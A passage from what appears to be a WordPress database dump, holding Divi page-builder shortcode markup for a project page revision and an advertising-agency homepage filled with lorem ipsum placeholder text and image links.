animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|500||on|||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_letter_spacing=\"3px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" locked=\"off\"]<p>Product Design</p>\r[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#ffffff\" header_font_size=\"60px\" header_line_height=\"1.3em\" header_2_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>My Project</h1>\r[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#ffffff\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" locked=\"off\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fullwidth Image\" _builder_version=\"3.22\" custom_padding=\"110px|0px|110px|0px\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-03-1.png\" show_in_lightbox=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"2%\"][/et_pb_image][et_pb_text _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"fade\" animation_direction=\"top\"]<p><span>Donec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis. Ut felis velit, sollicitudin.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Text and Image\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px|0px|110px|0px\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#747d88\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" header_3_font=\"Montserrat||||||||\" header_3_line_height=\"1.5em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"120px|||\" animation_style=\"fade\" animation_direction=\"top\"]<h3>Lorem Ipsum Dolor</h3>\n<p><span>Donec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis. Ut felis velit, sollicitudin a libero ultricies, gravida scelerisque elit. Integer euismod vitae magna bibendum feugiat. </span></p>\n<p><span>Sed tempor magna quis feugiat elementum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Image and Text\" _builder_version=\"3.22\" background_color=\"#ffffff\" custom_padding=\"110px|0px|110px|0px\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-02.jpg\" show_in_lightbox=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#747d88\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" header_3_font=\"Montserrat||||||||\" header_3_line_height=\"1.5em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"60px|||\" animation_style=\"fade\" animation_direction=\"top\"]<h3>Lorem Ipsum Dolor</h3>\r\n<p><span>Donec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Project1','','inherit','closed','closed','','236-revision-v1','','','2020-07-06 20:27:42','2020-07-06 20:27:42','',236,'https://52.66.212.87/2020/07/06/236-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (244,1,'2020-07-06 20:45:15','2020-07-06 20:45:15','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" 